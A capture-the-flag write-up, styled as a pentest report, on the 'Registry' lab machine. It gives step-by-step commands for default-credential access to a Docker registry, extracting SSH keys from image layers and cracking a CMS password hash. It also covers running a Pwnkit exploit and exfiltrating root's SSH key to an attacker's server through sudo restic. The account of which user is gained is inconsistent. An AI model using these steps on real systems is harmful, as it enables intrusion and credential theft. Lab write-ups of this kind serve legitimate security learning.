Registry CTF Writeup
Table of Contents
ToggleThe challenge calls for the exploitation of various security weaknesses, including the use of default credentials, exposure of sensitive information through docker images, and cracking of database passwords to gain unauthorized access. Additionally, it tests our ability to perform both horizontal and vertical privilege escalations by exploiting system misconfigurations and known software vulnerabilities. This scenario not only demands a deep understanding of penetration testing techniques and security analysis but also requires us to demonstrate our adeptness in web server enumeration, docker registry manipulation, and CMS vulnerability exploitation, ultimately leading to root access acquisition.
Executive Summary
Overview
This pentest report outlines the findings from a comprehensive penetration testing exercise conducted on the Registry CTF platform, specifically targeting the machine at 10.10.10.159. The assessment covered various aspects of the system's security, including service scanning, web server enumeration, and a series of vulnerability exploitations to gain unauthorized access and escalate privileges.
Key Findings
Weak Credentials (BS01): The Docker Registry API hosted at
docker.registry.htb
was found to be accessible using default credentials (admin:admin
), posing a significant security risk due to unauthorized access to the docker registry repository. This finding is of elevated severity.Sensitive Information Exposure (BS02): A critical vulnerability was identified allowing remote attackers to access sensitive files within the "bolt-image" docker image, including SSH private keys and their decryption passwords. This issue is rated as high severity due to the potential for sensitive information exposure.
Exposed Bolt CMS Credentials (BS03): The admin's bcrypt password hash was retrieved and cracked from the boltcms database, indicating a weak password policy. This vulnerability, rated as elevated severity, could allow attackers to gain control over the Bolt CMS.
Horizontal Privilege Escalation (BS04): By exploiting the cracked admin password for Bolt CMS, attackers can upload a PHP shell to gain access as user "git". This vulnerability is also rated as elevated severity.
Vertical Privilege Escalation - Pwnkit (BS05): An extreme severity vulnerability was discovered due to the presence of an outdated and vulnerable version of pkexec, allowing attackers to gain administrative rights on the target machine through
CVE-2021-4034
.Vertical Privilege Escalation - Restic (BS06): Another extreme severity issue was found where the
www-data
user had sudo rights over the binaryrestic
, enabling attackers to read sensitive information, such as root's SSH keys.
Recommendations
- Immediate Update of Default Credentials: Change all default credentials to complex, unique passwords to prevent unauthorized access.
- Patch and Update Systems: Regularly update all system components to their latest versions to fix known vulnerabilities, especially for critical issues like Pwnkit and Restic.
- Implement Strong Password Policies: Enforce strong password policies for all users, including the use of password managers, to prevent easy password cracking.
- Regular Security Audits and Vulnerability Assessments: Conduct regular security assessments to identify and mitigate potential vulnerabilities before they can be exploited by attackers.
Summary
The penetration test on the Registry CTF revealed several significant security vulnerabilities that could potentially compromise the integrity, confidentiality, and availability of the system. It is imperative that the recommended actions are implemented promptly to safeguard against unauthorized access and data breaches. Continuous monitoring and regular security assessments are crucial to maintaining a robust security posture.
Initial Target - 10.10.10.159
Virtual Host: registry.htb docker.registry.htb
Service Scanning
IP Address | Ports Open |
---|---|
10.10.10.159 | TCP: 22 (OpenSSH 7.6p1) 80 (nginx 1.14.0) 443 (nginx 1.14.0) |
Identified services on IP address 10.10.10.159 include OpenSSH 7.6p1 on port 22, nginx 1.14.0 on ports 80 and 443, indicating a standard web server setup. The presence of these services suggests potential avenues for further investigation, particularly through the web server.
Web Server Enumeration
The root web server only displays the default nginx page on both port 80 and 443. A self-signed SSL certificate on port 443 reveals a subdomain docker.registry.htb, hinting at the existence of a Docker Registry API hosted within the network, providing a specific target for deeper exploration.
BS01: Weak Credentials
Explanation: The Docker Registry API endpoint at docker.registry.htb
was protected by basic authentication, but was using default credentials (admin:admin
), creating an opportunity for unauthorized access. This vulnerability signifies a critical oversight in secure configuration practices, allowing potential attackers to interact with the docker registry repository.
Severity: Elevated
Recommendation: Implement stronger authentication measures by changing the default credentials to a complex, unique password. Additionally, consider integrating two-factor authentication (2FA) to add an extra layer of security.
Steps to Reproduce:
- In the following command, we're listing all the available repositories by querying the
_catalog
endpoint, but there are plenty of docker registry API endpoints:curl -k https://docker.registry.htb/v2/_catalog -H "Authorization: Basic YWRtaW46YWRtaW4="
BS02: Sensitive Information Exposure
Explanation: Through exploitation of the weak credentials in BS01, sensitive internal files of the "bolt-image" docker image were accessible, including SSH private keys and their passwords. This exposure could allow attackers to perform further malicious activities with potentially wide-reaching impact on confidentiality and system integrity.
Severity: High
Recommendation: Immediately revoke and regenerate all exposed SSH keys and passwords. Establish stricter access controls and regularly scan docker images for sensitive information before deployment. Additionally, implement a secure secret management solution to protect credentials and keys.
Steps to Reproduce:
First, we need to get the manifest:
curl -k https://docker.registry.htb/v2/bolt-image/manifests/latest -H "Authorization: Basic YWRtaW46YWRtaW4=" > bolt-image.manifest
I created a python script to automate the download process for all the blobs, you can save it locally to
script.py
.
import json, requests, urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
with open('bolt-image.manifest') as f:
manifest = json.load(f)
layers = manifest['fsLayers']
blobs = [x['blobSum'] for x in layers]
BASE_URL = 'https://docker.registry.htb/v2'
HEADERS = {
"Authorization": "Basic YWRtaW46YWRtaW4="
}
for index, blob in enumerate(blobs):
r = requests.get(f"{BASE_URL}/bolt-image/blobs/{blob}", headers=HEADERS, verify=False)
filename = f'blob-{index}.tar'
with open(filename, 'wb') as f:
f.write(r.content)
print(f'Wrote tarball content for {filename}')
Run the script:
python3 script.py
and wait until all the 9 blobs are downloadedExtract the fourth blob:
tar -xf blob-4.tar
Explore the newly created directories. The password we need to use in order to decrypt the
./root/.ssh/id_rsa
private key is located at./etc/profile.d/02-ssh.sh
, which is:GkOcz221Ftb3ugog
To create a decrypted version of the ssh key:
openssl rsa -in id_rsa -passin "pass:GkOcz221Ftb3ugog" > id_rsa.decrypted
Initial Access & Post-Exploitation
BS03: Exposed Bolt CMS Credentials
Explanation: By gaining access to the boltcms database, the admin's bcrypt password hash was retrieved and cracked, revealing a weak password policy. This vulnerability allowed unauthorized administrative access to Bolt CMS, highlighting the importance of robust password policies and secure database management.
Severity: Elevated
Recommendation: Strengthen password policies to include minimum complexity requirements and periodic password changes. Use bcrypt with higher cost factors to increase hash cracking difficulty. Regularly audit database access and encrypt sensitive data at rest.
Steps to Reproduce:
Download the Bolt CMS database to your local system:
scp -i id_rsa.decrypted [email protected]:/var/www/html/bolt/app/database/bolt.db ./bolt.db
Use sqlite3 to intract with the database:
sqlite3 bolt.db
Execute the command
select * from bolt_users;
and copy the password hash for the admin user:$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK
Save the hash to a file (hash.txt) and use hashcat to crack it:
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
The cracked password (strawberry) should appear after some processing.
BS04: Horizontal Privilege Escalation
Explanation: Utilizing the cracked admin password for Bolt CMS, it was possible to upload a PHP shell and gain access as user "www-data". This vulnerability underscores the critical need for secure web application configurations and the principle of least privilege.
Severity: Elevated
Recommendation: Conduct a thorough security review and hardening of the CMS configuration. Disable or restrict file upload functionality to trusted administrators only and ensure uploaded files are properly sanitized and validated. Implement application-level firewalls and intrusion detection systems to monitor for suspicious activities.
Steps to Reproduce:
- Run the PoC created by BehindSecurity to obtain RCE as www-data.
BS05: Vertical Privilege Escalation - Pwnkit
Explanation: An outdated and vulnerable version of pkexec enabled the exploitation of CVE-2021-4034
, allowing unprivileged users to gain administrative rights. This critical vulnerability exposes the system to significant risk, emphasizing the need for regular software updates and vulnerability management.
Severity: Extreme
Recommendation: Immediately apply the latest patches and updates for all system software, particularly focusing on known vulnerabilities like CVE-2021-4034
. Establish a continuous monitoring and patch management program to ensure systems are protected against new vulnerabilities as they are discovered.
Steps to Reproduce:
Download this public PoC for CVE-2021-4034:
git clone https://github.com/berdav/CVE-2021-4034.git
Zip it:
zip -r cve.zip CVE-2021-4034/
Transfer the zip file to the target machine:
scp -i id_rsa.decrypted cve.zip [email protected]:/dev/shm/cve.zip
In the target machine, as
bolt
:cd /dev/shm && unzip cve.zip
Enter the folder and make the exploit:
cd CVE-2021-4034 && make
Execute the exploit to obtain root access to the machine:
./cve-2021-4034
BS06: Vertical Privilege Escalation - Restic
Explanation: The www-data
user had sudo rights over the binary restic
, permitting a malicious actor to access and potentially modify sensitive information, such as root's SSH keys. This vulnerability highlights critical flaws in permission assignments and the enforcement of the principle of least privilege.
Severity: Extreme
Recommendation: Review and revise sudoers configuration to enforce the principle of least privilege, ensuring that only necessary permissions are granted to each user or service account. Regularly audit system configurations and access rights to prevent elevation of privilege opportunities.
Steps to Reproduce:
Clone the restic rest server:
git clone https://github.com/restic/rest-server.git
Install it:
cd rest-server/ && make install
Run the rest server on your attacking machine:
rest-server --no-auth --listen 0.0.0.0:4433
There are rules that disallow outgoing connection from the machine, so we need to tunnel the connection via SSH:
ssh -i id_rsa.decrypted [email protected] -R:4433:localhost:4433
Initialize a restic repo:
restic init -r rest:http://127.0.0.1:4433/bsec
Create a backup for the
/root
folder:sudo restic backup -r rest:http://127.0.0.1:4433/bsec /root
In your attacking machine, get the contents of root's id_rsa:
restic -r /tmp/restic/bsec/ dump latest /root/.ssh/id_rsa
Now, you just have to create the id_rsa and log in as root using ssh:
ssh -i id_rsa [email protected]
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.